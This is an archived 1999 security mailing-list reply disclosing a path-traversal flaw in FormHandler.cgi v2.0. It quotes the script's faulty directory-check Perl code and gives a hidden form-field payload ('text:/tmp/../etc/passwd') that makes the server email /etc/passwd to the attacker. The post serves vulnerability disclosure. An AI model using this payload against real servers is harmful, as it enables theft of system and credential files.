Re: FormHandler.cgi

From: m4rcyS (marcysat_private)
Date: Tue Nov 16 1999 - 07:46:33 PST

Next message: Peter Kane: "Re: Windows NT update carries bug"

Previous message: antirezat_private: "hping2"
Maybe in reply to: Mnemonix: "FormHandler.cgi"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

On Fri, 12 Nov 1999, Mnemonix wrote:

> A quick search of the databases didn't show anything about this particular problem though the principle is well recognised as an issue:
>
> FormHandler.cgi available from http://www.cgi-perl.com/programs/FormHandler
> uses hard coded physical paths for templates etc so it's possible to get sensitive files like /etc/passwd by modifying a site's form and submitting it.
>
> Cheers,
> David Litchfield
> http://www.infowar.co.uk/mnemonix/
> Cerberus Information Security
> +44(0)181 661 7405
>

Yeah, Matt's scripts security is a legend ;) Concrete example
(formhandler.cgi v2.0) - you can download ANY file which user nobody has
read perms to by attaching it to reply mail. Piece'o'code:

@ALLOWED_ATTACH_DIRS = ('all');		# hmm, nice defaults ;)
@RESTRICTED_ATTACH_DIRS = ('/etc/');
[...]

if (&valid_directory($filename)) {      # let's check if file is allowed
push(@files, $filename); [...] }        # to send
[...]

sub valid_directory {
    local ($filename) = $_[0];
    local ($allowed_path, $restricted_path);
    local($valid_dir) = 0;
    if ($ALLOWED_ATTACH_DIRS[0] =~ /^all$/i) { $valid_dir = 1 }
    else {
        foreach $allowed_path (@ALLOWED_ATTACH_DIRS) {
            $valid_dir = ($filename =~ /^$allowed_path/);      # silly ...
            last if $valid_dir;
        }
    }
    foreach $restricted_path (@RESTRICTED_ATTACH_DIRS) {
        $valid_dir = ($filename !~ /^$restricted_path/);       # once more
        last if !$valid_dir;
    }
    return $valid_dir;
}
[...]

How to d/l /etc/passwd ? Just add this to the form:
<INPUT TYPE="hidden" NAME="reply_message_attach"
VALUE="text:/tmp/../etc/passwd">

... and voila, now wait for /etc/passwd to come to your mailbox.
You can do exactly the same if @ALLOWED_ATTACH_DIRS is not set to
"all". Trivial, isn't it ?

It's just a one little sample of Matt's code. I think that we all have
seen enough examples of his creativity. This topic can become a
never-ending-story . Aleph, what do you think about killing every thread
with "Matt" and "CGI" keywords in topic ? ;))

greetz,
____________________________________________________________
                              m4rcyS

                   email: marcysat_private, mat_private

"I think there is a world market for maybe five computers."
                     - Thomas Watson, chairman of IBM, 1943
------------------------------------------------------------

Next message: Peter Kane: "Re: Windows NT update carries bug"
Previous message: antirezat_private: "hping2"
Maybe in reply to: Mnemonix: "FormHandler.cgi"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:12:54 PDT